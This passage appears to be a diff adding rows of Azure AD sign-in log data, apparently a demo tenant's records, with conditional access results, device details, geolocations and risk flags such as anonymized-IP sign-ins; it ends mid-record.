+142,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:39.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0e73dd93-bd88-4273-89eb-ac877bd43236,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",ec85dd07-c5e8-494c-aa5b-3f84a5cf0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ec85dd07-c5e8-494c-aa5b-3f84a5cf0600,SigninLogs,Sucess,50.6406517,5.572050095
+143,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f680c335-bc78-44a8-8570-4543e8aa0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f680c335-bc78-44a8-8570-4543e8aa0600,SigninLogs,Sucess,34.06555176,-118.2405396
+144,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5b639a8-c969-42bc-bfc2-0921363d4daf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",34a4214f-a676-41f3-9bb4-26fa470d0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,34a4214f-a676-41f3-9bb4-26fa470d0600,SigninLogs,Sucess,36.6404686,-78.26995087
+145,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:10.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,51af469f-7038-0000-54b3-36992a36b31e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:54,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",93ca542e-4eab-45c4-8608-b715dd0d0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,93ca542e-4eab-45c4-8608-b715dd0d0700,SigninLogs,Sucess,34.06555176,-118.2405396
+146,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:20.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ca0a64f-d511-445e-b6be-202dc87b6748,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 35, 'displayName': 'GBB demo', 'result': 'success', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",011e8186-a783-421c-9de9-872008460600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,011e8186-a783-421c-9de9-872008460600,SigninLogs,Sucess,34.06555176,-118.2405396
+147,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:01.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5daf469f-c042-0000-5577-07a693e20938,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f2f6aa0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1dbd81fd-18f7-4582-ba72-d8f2f6aa0800,SigninLogs,Sucess,34.06555176,-118.2405396
+148,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:42.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,01b1469f-f053-0000-5421-7f2de6a63adb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:23,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f676020900,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f676020900,SigninLogs,Sucess,-20.54751015,-47.4056282
+149,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:00.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 